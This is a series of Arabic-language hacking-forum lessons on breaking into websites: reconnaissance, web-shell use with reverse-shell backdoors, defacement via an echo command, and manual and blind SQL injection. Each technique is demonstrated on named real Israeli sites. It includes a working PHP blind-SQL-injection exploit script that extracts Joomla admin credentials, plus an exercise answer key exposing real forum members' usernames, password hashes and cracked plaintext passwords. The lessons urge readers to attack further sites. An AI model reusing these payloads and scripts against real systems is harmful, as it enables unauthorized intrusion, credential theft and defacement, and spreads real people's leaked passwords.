dq

7 : الدرس السابع: كيفية اختراق المواقع والمنتديات .. الجزء الأول

الدرس السابع: كيفية اختراق المواقع والمنتديات

الجزأ الأول

طبعا في هذا الدرس سنشرح مبدأيات واساسيات اختراق المواقع بعد ما تعلمنا بالسابق ثغرات ال file include وال sql injection وما شابه

وكوننا فكرة عن اختراق المواقع وتطبيق الثغرات ..

تبقى الفكرة ..

اريد اختراق موقع .. ماذا افعل ..

طبعا جواب هذا السؤال يعتمد على نوع الموقع وميكانيكيته ومحتوياته والسيرفر الذي هو عليه والداتا سنتر احيانا ..

يعني ماذا تفعل يجب ان تجمع اولا بيانات عن الموقع ..

كيف اجمع بيانات عن الموقع ..

أول شيء نقوم بفحص الموقع نفسه من الثغرات

مثلا نبحث عن file include ان كان لدينا ال source code للموقع ..

او نحاول مثلا بمتغيرات معينة التعديل عليها وما شابه

نبحث عن ثغرات ابلود .. اي ثغرات رفع ملفات

طبعا حتى الان نحن نعمل على الموقع نفسه ..

لكن اذا لم تتوفر ثغرة معينة بالموقع نفسه ..

نقوم بالبحث على السيرفر ..

كيف يتم ذلك .؟؟

أول شيء نقوم بتحديد نطاق السيرفر .. اي الاي بي للسيرفر

يمكن تحديده بعمل ping من الدوس

مثلا

كود:
C:\Users\Tha2r>ping www.soqor.net

Pinging soqor.net [69.162.109.92] with 32 bytes of data:

Reply from 69.162.109.92: bytes=32 time=735ms TTL=53
Reply from 69.162.109.92: bytes=32 time=745ms TTL=53
Reply from 69.162.109.92: bytes=32 time=734ms TTL=53
Reply from 69.162.109.92: bytes=32 time=759ms TTL=53

Ping statistics for 69.162.109.92:
****Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
****Minimum = 734ms, Maximum = 759ms, Average = 743ms

C:\Users\Tha2r>

وهنا يكون الاي بي 69.162.109.92

وطبعا بالنسبة لموقع صقور الاي بي خاص

اي انه لا توجد مواقع اخرى على هذا الاي بي ..

طبعا بالنسبة للمواقع الاخرى بالغالب سيكون هنالك مواقع على نفس الاي بي..

ومن ثم سنستخدم ال www.milw0rm.com

او اي موقع اخر للبحث عن ثغرات في المواقع التي في هذا السيرفر ..

الآن نفترض انه لم نقم بايجاد ثغرة على السيرفر ..

ماذا سنفعل ؟؟

سيتحتم علينا ايجاد بدائل ..

او مثلا عمل تخمين

ولكن اهم نقطة تكمن في الوصول للسيرفر

او ايجاد مدخل على السيرفر

مثل تطبيق ثغرة انكلود

او ثغرة مثل ثغرة الجوملا .. المهم ان نصل لشيل على السيرفر .. واعتقد تطبيق الثغرات شرح بالدروس السابقة

او حتى اكتشاف sql على موقع من مواقع السيرفر تمكننا من الوصول لتحكم موقع وثم البدأ بالولوج للسيرفر

طبعا هذا الدرس مقدمة لانه سيقسم لعدة اجزاء

سلام

6 : الدرس السادس : شرح كيفية استخدام الشيل + رفع الاندكس


بسم الله الرحمن الرحيم
كيفكم يا اعضاء صقور ان شاء الله بخير
اليوم بأذن الله راح اشرح لكم شل صقور وطريقة تغيير الأندكس
نبدى على بركة الله تابع معي الصوره
1 : الكرنل
2 : وضع الأمان
3 : اصدار الـ php
4 : البرامج الموجوده على السيرفر
5 : الدوال المعطله بسرفر
6 : مساحة السيرفر
7 : صلاحياتك على السيرفر
8 : مسارك الحالي على السيرفر
9 : هذا الخيار يعمل فقط على سيرفرات الوندوز لتنقل بين الـ C أو الـ D
10 : العوده للمكان الرئيسي المرفوع فيه الشل
11 : لتطبيق أوامر ال PHP
12 : لتنفيذ الأوامر على السيرفر
13 : باك دور للأتصال العكسي وفتح منفذ بالسيرفر
14 : الأتصال العكسي
15 : للأتصال بقواعد البيانات
16 : معلومات على الـ PHP
17 : الخروج من الشل
18 : الملفات الموجوده على السيرفر
19 : ~
DOWN = تحميل الملف
EDIT = تحرير الملف
DEL = حذف الملف
20 : سطر الأوامر
21 : أوامر جاهزه لطتبيق والبحث
22 : صناعة ملف
23 : صناعة مجلد
24 : رفع ملف على السيرفر
25 : الذهاب للمسار معين انت تحدده
26 : بعض الدوال للتخطي وضع الأمان وقرأت الملفات
27 : بعض الدوال لتخطي وضع الأمان وقرأت الملفات الموجوده بمجلد معين
28 : ادوات تساعدك في التخطي وضع الأمان والأتصال بقواعد البيانات MYSQL
29 : باك دور فتح منفذ بالسيرفر
30 : ~ للأتصال العكسي
30 : الأي بي الخاص بك
31 : البورت الذي تريد الأتصال عليه
——————————————
والأن شرح تغير الأندكس
طبعا الكل عارف ان الأندكس ممكن ايكون index.html او index.php او index.htm
مثلا هذا الأندكس نرووح على كلمة EDIT
الي شرحناها بدرس فوق
راح انشوف هادي الصوره
شايفين المربع ,, اتحط فيه الأندكس بتاعك وبتضغط على كلمة SAVE
وانروح انشوف الصفحه الرئيسيه للموقع
تم الأختراق بحمد الله ,,
وتقدر كمان بطريقة اخرى وبسيطه من سطر الأوامر
echo “Get Own3d By jerusalem hacker || SOQOR.NET” > index.html
قم بتغير هذه الجمله Get Own3d By jerusalem hacker || SOQOR.NET
بسورس كود الخاص بالأندكس بتاعك
سلام

5 / 8 : الدرس الخامس ( استخدام ادوات مساعده لتسهيل الاختراق )

بسم الله الرحمن الرحيم اخواني الاعزاء هذا الدرس الدسم نوعا ما وهو خاص بحقن قواعد البيانات SQL Injection

الدرس بكل بساطه عنوانه :

SQL inject + find admin cp + login into cp + uploading shell
+
find lost shell

يعني حقن الموقع واستخراج المعلومات اللازمه من اسم المستخدم وكلمه مرور مدير الموقع
+
ايجاد لوحه التحكم
+
الدخول للوحه
+
رفع الشل من لوحه التحكم
+
والاهم من هذا كله هو احدى طرق ايجاد الشل في حال تم رفعه وقام سكربت الرفع في الموقع

بتغيير اسم الشل كيف تستطيع ايجاده !!!!!!!!!!!!!!

وطبعا الدروس

حصريا على صقور الهكرز وليس له مثيل في المنتديات العربيه كلها

ممنوع النقل دون ذكر المصدر

انا شفت بعض الدروس منقوله في عده منتديات دون ذكر المصدر لا ويزيد الطين بله انه يدخل ويسرق الدرس

وبالاخر يكتب انه تعب كثير في الدرس ومحتاج الدعوات والردود ههههههه

مثال على نقل الدرس الاول في الدوره :

http://vb.silence-gate.com/showthread.php?t=20522

ولله في خلقه شؤون !!!!

المهم اخواني الدرس شرح بالفيديو سويته لكم انشالله يفيدكم

وصدقوني للي كرهوا الاختراق عن طريق SQL رح يرجع ويعشقها انشالله بعد هالدرس

وانا شخصيا افضلها عن باقي الثغرات وكل شلاتي على المواقع منها

انا طولت بالمقدمه اعذروني

الدرس للي يحب يشوفه على you tube قمت برفعه لاجلكم علشان الي ما رح يقدر يحمل

هذا الرابط وبجوده عاليه جدا

وهذا رابط اداه البيرل يجب تثبيتها كي يعمل السكربت المرفق بشكل جيد

http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.6.811-MSWin32-x86-122208.msi

وهذه الروابط لتحميل الدرس كامل مع الادوات المستخدمه في الشرح على سيرفر محبوب من الجميع

وهذه السيرفرات اخرى وشكرا للاخ رائد على التذكير بهذه السيرفرات واختر السيرفر المفضل لديك

 

 


 

 

 

 

 

 

 

 

 

 

 

 

 

 


 

 


وهذا رابط اللروابط كلها

من هنا

ويا عمر الدرس فيه اغاني فك السماعات هههههههههههههههههههه

صقور الهكرز ||.!!.M4ST3R.!!.||

بالتوفيق اخواني

سلام

5 / 7 : الدرس الخامس الحقن الأعمى – Blind SQL Injection

السلام عليكم,الدرس الأخير من سلسلة دروس الحقن سنخصصه لثغرة الحقن الأعمى Blind SQL Injection هذا الدرس صعب نوعا ما وحاولت تبسيطة لأكبر قدر ممكن, ولكنه سهل إذا ركزتم وقرأتم الدرس بهدوء وطبقتم جيدا.

هذا النوع من الثغرات منتشر بكثرة إلا أن استغلاله يتطلب جهدا وصبرا أكثر من ثغرة الحقن الاعتيادية..

كعادتنا في الدروس السابقة سيكون فأر التجارب موقعا اسرائيليا (لعنة الله على الصهاينة إلى يوم الدين).

http://www.menikot.com

والثغرة موجودة بالمكون التالي :

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20

<span style=\”color:#0000FF\”>طريقة اكتشاف الثغرة :

أولا نضيف and+1=1 ثم نرى النتائج :

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+1=1
This image has been resized. Click this bar to view the full image. The original image is sized 1280×1024.

كما في الصورة الصفحة تظهر عادية, جميل جدا.

ثانيا نضيف شيء غير منطقي في الاستعلام مثلا and+1=2 ثم نرى النتيجة :

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+1=2
This image has been resized. Click this bar to view the full image. The original image is sized 1280×1024.

كما في الصورة لم تظهر لنا الصفحة السابقة كاملة, إذن الموقع مصاب بثغرة الحقن الأعمى.

أحيانا لا تظهر صورة واحدة أو عدة صور أو أحد المقالات أو أحد العناوين… وهذا يدل على أن الموقع مصاب بثغرة الحقن الأعمى.

لمعرفة نسخة قاعدة البيانات :

نضيف أولا and+substring(@@version,1,1)=4

أي نطبق الاستعلام التالي :

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+substring(@@version,1,1)=4
This image has been resized. Click this bar to view the full image. The original image is sized 1280×1024.

ظهرت لنا الصفحة الخاطئة.

الآن نضيف and+substring(@@version,1,1)=5

نطبق الاستعلام التالي :

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+substring(@@version,1,1)=5
This image has been resized. Click this bar to view the full image. The original image is sized 1280×1024.

ظهرت لنا الصفحة الصحيحة, إذن يتعلق الأمر بالنسخة الخامسة لقاعدة البيانات.

لكي لا نكرر الصور في بقية الدرس سنسمي الصورة الأولى الصفحة الصحيحة والثانية الصفحة الخاطئة.

الآن نرى هل تعمل subselect :

نضيف and+(select+1)=1

إذن نطبق الاستعلام التالي :

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+(select+1)=1

ظهرت لنا الصفحة الصحيحة إذن subselect تعمل ومن هنا سنرى هل يمكننا القراءة من mysql.user

نطبق الاستعلام التالي :

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+(select+1+from+mysql.user+limit+0,1)=1

لم تظهر لنا الصفحة الصحيحة ولا الخاطئة الاعتيادية, إذن ليس لدينا الصلاحية لقراءة mysql.user ولو كانت لدينا هذه الصلاحية لتمكنا من معرفة الباسوورد واليوزر الذي يستعمل في قاعدة البيانات وذلك باستعمالنا لخاصية load_file() وخاصية OUTFILE

لا بأس سنكمل تطبيقنا رغم أن الطريق لا يزال طويلا لإيجاد اليوزر والهاش..

معرفة الجداول والأعمدة :

لمعرفة الجداول والأعمدة نستعمل التخمين كالتالي :

لنفترض أن اسم الجدول الذي يضم اليوزر هو user, نضيف التالي and+(select+1+from+user+limit+0,1)=1

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+(select+1+from+user+limit 0,1)=1

إذا ظهرت الصفحة الصحيحة يعني أن الجدول user موجود وإذا ظهرت غير ذلك يعني أنه غير موجود ويجب في هذه الحالة وضع تخمين آخر.

بالنسبة للأعمدة نطبق نفس الشيء تقريبا بعد معرفة اسم الجدول (لنفترض أن اسم الجدول الصحيح هو admins) :

نضيف التالي :

and+(select+substring(concat(1,password),1,1)+from admins limit+0,1)=1

إذا ظهرت الصفحة الصحيحة يعني أن العمود password موجود بالجدول admins

الآن هناك طريقة سهلة غير التخمين لمعرفة الجداول والأعمدة :

إذا كان نظام إدارة المحتوى CMS الذي يستعمله الموقع معروف لا حاجة للتخمين لأن أسماء الجداول تكون معروفة ومتداولة.

إذا رأينا سورس كود الصفحة الرئيسية للموقع نجد التالي :

 

كود:
**<meta name=\"generator\" content=\"Joomla! 1.5 - Open Source Content Management\" />

يعني أن نظام إدارة المحتوى هو النظام الشهير Joomla وبالتالي نعرف مسبقا اسم الجداول والأعمدة, سنقوم إذن بالاستعلام من jos_users وسنستعمل أسماء الأعمدة username و password

سأقوم لاحقا إن شاء الله بطرح موضوع جديد لأسماء الجداول والأعمدة لأشهر ال CMS

استخراج اليوزر :

الاستخراج يتم حرفا بحرف وكل حرف يتطلب تجريب العديد من الاستعلامات..

سنقارن تصاعديا كل حرف بالكود أسكي المقابل له. بالنسبة للأعضاء الذين لا يعرفون الكود أسكي يمكنهم الاطلاع على الرابط التالي :

http://ar.wikipedia.org/wiki/%D8%A2%D8%B3%D9%83%D9%8A

استعلام المقارنة يكون على الشكل التالي :

and+ascii(substring((SELECT+username+from+jos_user s+limit 0,1),1,1))>XX

حيث XX هو الكود أسكي للحرف المقارن به.

نطبق الاستعلام الأول :

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+ascii(substring((SELECT+username+from+jos_users+limit 0,1),1,1))>40

الصفحة صحيحة يعني أن الحرف الأول من اليوزر الكود أسكي الخاص به أكبر من 40

نواصل..

نطبق الاستعلام الثاني :

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+ascii(substring((SELECT+username+from+jos_users+limit 0,1),1,1))>41

الصفحة صحيحة يعني أن الحرف الأول من اليوزر الكود أسكي الخاص به أكبر من 41

نواصل..

نطبق الاستعلام الثالث :

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+ascii(substring((SELECT+username+from+jos_users+limit 0,1),1,1))>42

الصفحة خاطئة يعني أن الكود أسكي الخاص بالحرف ليس أكبر من 42 (وأكبر من 41 كما جربنا سابقا) وبالتالي فالكود أسكي الخاص بالحرف الأول من اليوزر هو 42 أي أن الحرف الأول من اليوزر هو *

وأخيرا وجدنا الحرف الأول

بالنسبة للحرف الثاني نطبق نفس الشيء إلا أن الاستعلام يتغير فيه الرقم ويكون كالتالي :

and+ascii(substring((SELECT+username+from+jos_user s+limit 0,1),2,1))>XX

الاستعلام يكوم صحيحا عند أكبر من 117 :

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+ascii(substring((SELECT+username+from+jos_users+limit 0,1),2,1))>117

ويكون خاطئا عند أكبر من 118

أي أن الكود أسكي الخاص بالحرف الثاني من اليوزر هو 118 وبالتالي الحرف الثاني من اليوزر هو v

وهكذا دواليك نواصل حرفا بحرف إلى أن نحصل على اليوزر كاملا.

بعد عناء طويل ستجدون أن اليوزر هو *vererd*

استخراج الهاش :

بالنسبة ل Joomla CMS الهاش إما MD5 عادي وإما MD5 Salted (يمكنكم الاطلاع على موضوع بقسم فك التشفير والهاش لمعرفة ذلك).

في حالة كون الهاش not salted الهاش يتكون من أرقام وأحرف وبالتالي سيكون مجال الأسكي الذي سنقارن فيه 48-57 ثم 97-102 أما في الحالة الأخرى فيجب استعمال مجال أوسع لأن السالت قد يحتوي على أحرف خاصة.

نطبق الاستعلام الأول :

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+ascii(substring((SELECT+password+from+jos_users+limit 0,1),1,1))>48

الصفحة صحيحة يعني أن الحرف الأول من الهاش الكود أسكي الخاص به أكبر من 48

نواصل..

نطبق الاستعلام الثاني :

 

كود:
http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&sectionid=20+and+ascii(substring((SELECT+password+from+jos_users+limit 0,1),1,1))>49

الصفحة صحيحة يعني أن الحرف الأول من الهاش الكود أسكي الخاص به أكبر من 49

نواصل حتى نصل إلى 54 فلا نحصل على صفحة الخطأ ولما نطبق على 55 نحصل عليها يعني أن الحرف الأول من الهاش هو ascii(55) وبالتالي هو 7

بنفس طريقة استخراج اليوزر نواصل حتى نستخرج الهاش كاملا وهو : 71eb8f07ba741f366d3502dccd43e696

الطريقة الأوتوماتيكية :

طبعا لاحظتم أن تطبيق هذه الثغرة يدويا أمر متعب جدا, ولكن يجب أن تعرفوا أصل وطريقة استغلال الثغرة حتى لا تصنفوا من أطفال الهكر الذين يستعملون أدوات الاختراق دون معرفة ماذا تفعل الأداة.

هناك أدوات عديدة مساعدة تقوم بالعمل تلقائيا مثل sqlmap التي يمكنكم تحميلها هنا :

http://sqlmap.sourceforge.net/#download

هناك طريقة أخرى فعالة وهي كتابة سكريبت بسيط ب perl أو PHP أو أي لغة برمجة تتقنونها.

سأعطيكم سكريبت مكتوب ب PHP أستعمله لاستغلال ثغرة الحقن الأعمى وأعدله حسب الحاجة. السكريبت يعمل من PHP from Command line

 

كود:
<?
ini_set(\"max_execution_time\",0);
print_r('
----------------------------------------------------------------------------
- Blind SQL Injection Exploit**********************************************-
- Usage example: php exploit-blind.php \"http://www.site.com/blah.php?id=1\" -
----------------------------------------------------------------------------
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url.\"+and+1=1--\"));
$w = strlen(file_get_contents($url.\"+and+1=0--\"));
$t = abs((100-($w/$r*100)));
echo \"\n Username : \";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+username+from+jos_users+limit+0,1),\".$i.\",1))!=0--\"));
** if (abs((100-($laenge/$r*100))) > $t-1) {
******$count = $i;
******$i = 30;
** }
}
for ($j = 1; $j < $count; $j++) {
** for ($i = 40; $i <= 122; $i=$i+2) {
**** if ($i == 60) {
******** $i = 98;
******}
******$laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+username+from+jos_users+limit+0,1),\".$j.\",1))%3E\".$i.\"--\"));
****if (abs((100-($laenge/$r*100))) > $t-1) {
******** $laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+username+from+jos_users+limit+0,1),\".$j.\",1))%3E\".($i-1).\"--\"));
****if (abs((100-($laenge/$r*100))) > $t-1) {
************echo chr($i-1);
******** } else {
************echo chr($i);
******** }
******** $i = 122;
******}
** }
}
echo \"\n Password : \";
for ($j = 1; $j <= 49; $j++) {
** for ($i = 46; $i <= 102; $i=$i+2) {
****if ($i == 60) {
******** $i = 98;
******}
******$laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+password+from+jos_users+limit+0,1),\".$j.\",1))%3E\".$i.\"--\"));
****if (abs((100-($laenge/$r*100))) > $t-1) {
******** $laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+password+from+jos_users+limit+0,1),\".$j.\",1))%3E\".($i-1).\"--\"));
****if (abs((100-($laenge/$r*100))) > $t-1) {
************echo chr($i-1);
******** } else {
************echo chr($i);
******** }
******** $i = 102;
******}
** }
}
}
?>

كما أشرت سابقا يمكن التعديل على السكريبت لتغيير اسم الجدول أو لتغيير مجال الأسكي لكي يصبح أسرع أو لكي يعطي السالت الذي يحتوي على الأحرف الخاصة.

تشغيل هذا الاكسبلويت بطيء نسبيا ويتغير حسب سرعة الاتصال وسرعة سيرفر الموقع, يتراوح استخراج اليوزر والهاش من دقيقتين إلى ساعة كاملة.

السكريبت في المرفقات ولتطبيقه على هذا الموقع الذي جربنا عليه يجب تنفيذ الأمر التالي من الكونسول في نظام لينكس أو من الدوس في نظام ويندوز بعد تنصيب البي إتش بي.

 

كود:
php exploit-blind.php \"http://www.menikot.com/index.php?option=com_ijoomla_archive&task=archive&search_archive=20\"

أنتهى الدرس أرجوا أن تكونوا قد استفدتم منه ونتمنى أن نرى تطبيقاتكم على مواقع أخرى.

جميع الحقوق محفوظة للكاتب Alkindiii ولمنتديات صقور الهكرز www.soqor.net

** سبحانك لا علم لنا إلا ما علمتنا إنك أنت العليم الحكيم **

تحياتي.

الملفات المرفقة

نوع الملف: php exploit_blind.php‏ (2.0 كيلوبايت, المشاهدات 46)

5 / 6 : الدرس الخامس : حقن قواعد البيانات sql injection .. ملحق .. تطبيق عملي

بسم الله الرحمن الرحيم

في هذا الدرس سنبدأ بشرح عندما تجد ثغرة SQL injection ما تقوم به بالتفصيل .. وهو مشروح في الدروس السابقة ولكن هذا الدرس تكملة وتطبيق عملي عليهم

اولا مثلا دخلنا موقع حزب كاديما الاسرائيلي

وجدنا روابط

مثلا
http://www.kadima.org.il/Includes/inc_forum.php?kat=4

قمنا باضافة ‘ بعد الرابط

يصبح
http://www.kadima.org.il/Includes/inc_forum.php?kat=4′

ظهر خطأ

إذا يوجد خطأ SQL وسنحاول استغلاله

ولكن اولا سنحاول معرفة عدد الحقول

http://www.kadima.org.il/Includes/inc_foru…-1+order+by+1/*

نبدأ
http://www.kadima.org.il/Includes/inc_foru…=4+order+by+1/*

ظهرت النتائج

نكمل

حتى نصل

http://www.kadima.org.il/Includes/inc_foru…4+order+by+12/*

لم يظهر شيء

اذا عدد الحقول 11

نجرب

http://www.kadima.org.il/Includes/inc_foru…6,7,8,9,10,11/*

طبعا استبدلنا kat=4 الى kat=-4 لأنه اذا بقى على رقم حقل موجود لن يظهر لنا نتيجة

المهم الان

ظهر لنا نتيجة الاستعلام

الان مثلا نستبدل رقم 10

ب version لنرى النتيجة

http://www.kadima.org.il/Includes/inc_foru…,@@version,11/*

النسخة
5.0.45-log

اذا سيمكننا استخدام جدول information_schema

نضع الان الاستعلام بالشكل التالي

لنجرب امكانية الاستعلام

http://www.kadima.org.il/Includes/inc_foru…chema.columns/*

تم ولا يوجد اي مشكلة

الان سنضع بدال

كود:
@@version
كود:
concat(table_name,char(58),column_name)

وهذا يظهر النتائج كالتالي
table:column

أي سيظهر الجدول : الحقل

يصبح الرابط

http://www.kadima.org.il/Includes/inc_foru…chema.columns/*

الان انظر النتيجة على الصفحة

قد ظهر عنا جميع الحقول والجداول بدون ادنى عناء

الآن نبحث عن جدول نشتبه به انه جدول الادارة وننظر حقوله

وجدنا كثير من الجداول المشابهة

والآن يمكننا الاستعلام من جميع الجداول التي يمكن لهذا المستخدم الوصول لها

طبعا جدول الادارة هنا

tbaccess

والحقول

user

pass

والاستغلال

http://www.kadima.org.il/Includes/inc_foru…from+tbaccess/*

طبعا هنا كلمة المرور غير مشفرة ويبقى عليك ايجاد مسار اللوحة

كانت معي ولكنها تغيرت بعد اخر اختراق

المهم ان تكونو ان شاء الله وصلت لكم المعلومة

ويبقى بعد ذلك ايجاد اللوحة

وكسر الباسوورد ان كان مشفرا !!

واختراقات موفقة

سلام

5 / 5 : الدرس الخامس : حل اختبار حقن قواعد البيانات sql injection


السلام عليكم,

أولا نبارك للعضوين الوحيدين اللذان قاما بحل الأسئلة الخمسة وهما الأخت صفا سوفت والأخ NET-MASTER.

حلول الاختبار مرفقة بصور النتائج هي كالتالي :

س1 : ما هو عدد الأعمدة المصابة وأعط رقم كل عمود

ج 1 : بعد اكتشاف الخطأ ومعرفة عدد الأعمدة بواسطة الأمر order by نستنتج بعد الاستعلام التالي أن عدد الأعمدة المصابة واحد ورقمه 8 ويظهر هذا الرقم بأسفل الصفحة في الرابط التالي.

http://www.kedma.co.il/index.php?id=1916+U…3,14,15,16,17/*

النتيجة في الصورة :

س 2 : ما هو إصدار قاعدة البيانات

ج 2 : الإصدار هو 5.0.45 ونعرفه بعدما نطبق الاستعلام التالي :

http://www.kedma.co.il/index.php?id=1916+U…3,14,15,16,17/*

النتيجة كما ترونها في الصورة :

س 3 : أعط أسماء كل الجداول (tables) الموجودة بقاعدة البيانات

ج 3 : نطبق الاستعلام التالي :

http://www.kedma.co.il/index.php?id=1916+U…schema.tables/*

ونحصل على أسماء الجداول التالية :

CHARACTER_SETS:COLLATIONS:COLLATION_CHARACTER_SET_ APPLICABILITY:COLUMNS:COLUMN_P
RIVILEGES:KEY_COLUMN_USAGE:PROFILING:ROUTINES:SCHE MATA:SCHEMA_PRIVILEGES:STATIST
I
CS:TABLES:TABLE_CONSTRAINTS:TABLE_PRIVILEGES:TRIGG ERS:USER_PRIVILEGES:VIEWS:all_
p
ages:archive:blocked_ip:cat_config:comments:groups :ke_bans:ke_categories:ke_cens
o
ring:ke_config:ke_forum_perms:ke_forums:ke_groups: ke_online:ke_posts:ke_ranks:ke
_
reports:ke_search_cache:ke_search_matches:ke_searc h_words:ke_subscriptions:ke_to
p
ics:languages:links:n_tblld_archiveagesanels hpbb_auth_accesshpbb_banli
s
thpbb_categorieshpbb_confighpbb_confirmhpb b_disallowhpbb_forum_prune
h
pbb_forumshpbb_groupshpbb_postshpbb_posts_te xthpbb_privmsgshpbb_privms
g
s_texthpbb_rankshpbb_search_resultshpbb_sear ch_wordlisthpbb_search_wordm
a
tchhpbb_sessionshpbb_smilieshpbb_themeshpb b_themes_namehpbb_topicshp
b
b_topics_watchhpbb_user_grouphpbb_usershpbb_ vote_deschpbb_vote_results
h
pbb_vote_votershpbb_wordsictures:tree:users:us ers_back:users_groups

النتيجة في الصورة :

س 4 : يحتوي الموقع على منتدى يضم أكثر من 21000 عضو, المطلوب إيجاد إسم المستخدم وباسوورد العضوين رقم id = 2 و id = 21000

ج 4 : بالنسبة للعضو رقم 2 اسم المستخدم هو kaxz والباسوورد مشفر هو c826cc40ccc7b29569e7158aef690ec4

http://www.kedma.co.il/index.php?id=1916+U…ere+user_id=2–

بالنسبة للعضو رقم 21000 اسم المستخدم هو GlundSal والباسوورد مشفر هو 83b4ef5ae4bb360c96628aecda974200

http://www.kedma.co.il/index.php?id=1916+U…user_id=21000–

س 5 : قم بفك هاش باسوورد العضوين وأعط باسوورد العضوين غير مشفر (plain text)

ج 5 : من خلال نوع المنتدى وإصداره phpBB نستنتج أن الهاش هو md5 عادي (أدخل لقسم فك التشفير والهاش ستجد موضوع عن التشفير الخاص بكل منتدى).

بعد ذلك باستعمال أحد برامج فك الهاش أو الدخول إلى أحد مواقع فك الهاش md5 نجد أن :

c826cc40ccc7b29569e7158aef690ec4 = md5(kaxz)

83b4ef5ae4bb360c96628aecda974200 = md5(147852)

وبالتالي باسوورد العضو kaxz هو kaxz وباسوورد العضو GlundSal هو 147852.

أتمنى أن يكون هذا التمرين مفيدا للكل ونتمنى مزيدا من التفاعل مع الدروس والتطبيقات القادمة.

بالتوفيق للجميع.

تحياتي.

5 / 4 : تطبيق لدروس حقن قواعد البيانات sql injection

السلام عليكم,كما قال الأخ Dr.Cr@ck أحسن وسيلة لفهم دروس حقن البيانات هي التطبيق, سنطرح في هذا الموضوع تمرينا تطبيقيا على موقع إسرائيلي مصاب بهذه الثغرة.للإشارة الموقع لم يخترق من قبل نرجوا عدم محاولة اختراقه قبل إعطاء الأجوبة الصحيحة حتى يتمكن الأعضاء من التطبيق :P

الموقع الذي سنطبق عليه هو http://www.kedma.co.il والملف المصاب هو ملف الصفحة الرئيسية index.php

قبل طرح الأسئلة نشير إلى أن بعضها يتطلب بحثا إضافيا (إضافة إلى ما ورد في الدرسين السابقين).

كل عضو سيحاول الإجابة على الأسئلة التالية :

1- ما هو عدد الأعمدة المصابة وأعط رقم كل عمود

2- ما هو إصدار قاعدة البيانات

3- أعط أسماء كل الجداول (tables) الموجودة بقاعدة البيانات

4- يحتوي الموقع على منتدى يضم أكثر من 21000 عضو, المطلوب إيجاد إسم المستخدم وباسوورد العضوين رقم id = 2 و id = 21000

5- قم بفك هاش باسوورد العضوين وأعط باسوورد العضوين غير مشفر (plain text)

سنقوم إن شاء الله بطرح حل الأسئلة بعد خمسة أيام وكذلك قائمة الأعضاء الذين تمكنوا من حلها, وكل عضو تمكن من حل الأسئلة أو بعضها يمكنه مراسلتي على الخاص أو مراسلة Dr.Cr@ck بالأجوبة الصحيحة. نشير إلى أن الأسئلة على الخاص غير مقبولة وكل عضو لديه سؤال يمكنه طرحه في القسم الفرعي المخصص لاستفسارات الدورة حتى يستفيد الجميع.

كما قلت هذا الاختبار يتطلب بعض البحث وليس الاكتفاء بالدروس المعطاة.

لم ينجح أحد حتى الآن في الإجابة على أي سؤال, لذلك سأحاول التبسيط أكثر وسأعطيكم الرقم الصحيح للمتغير وهو id = 1916 وبذلك رابط الثغرة الذي ستطبقون عليه هو :

http://www.kedma.co.il/index.php?id=1916

في الحقيقة هذه حالة خاصة والثغرة غير موجودة في كل قيم المتغير (id) وذلك راجع ربما إلى استعمال بعض الشروط على المتغير id مثل if … elseif وفي بعض الشروط رقعت الثغرة وتركت في أخرى.

في العادة إذا كانت هناك ثغرة تكون موجودة على كل قيم المتغير ويكون الكود غير مفلتر شبيها بهذا المثال :

 

كود:
$result=mysql_query('SELECT * FROM news WHERE id="'.$_GET['id'].'"');

على أي حال ما دام لا يمكنك رؤية سكربت الصفحة ليست هناك قاعدة عامة في مثل هذه الحالات, وأحسن شيء لاكتشاف ثغرات غير تقليدية هي محاولة تخيل الكود الأصلي للصفحة وكيف فكر وأخطأ مبرمج الصفحة.

الآن أصبح الاختبار أسهل ويمكنكم بالتطبيق الحرفي للدرسين السابقين الإجابة على سؤالين أو ثلاثة أسئلة على الأقل.

أنتظر إرسال الإجابات على الخاص, إذا لم ينجح أحد سأحاول التبسيط أكثر.

تحياتي.

5 / 3 : الدرس الخامس: حقن قواعد البيانات sql injection (الجزء الثالث)

بسم الله الرحمن الرحيم

اخواني هذا تعديل الموقع لم بعد كما كان حين طرح الدرس

الموقع غير السيرفر الى وندوز واصبح اصدار mysql هو الخامس

ومع ذلك وجدت به ثغره ولمن اراد التطبيق فليطبق الدرس اعتمادا على هذا الرابط

http://www.virtualjerusalem.com/news.php?option=com_content&view=article&id=367:te en-terrorists-preferred-jail-to-home&catid=2:&Itemid=367%27

تابع باقي الدرس الان

سنتعلم في هذا الدرس كيفية قراءة ملفات السيرفر باستخدام الأمر LOAD_FILE ورفع الشل عن طريق الأمر INTO OUTFILE.

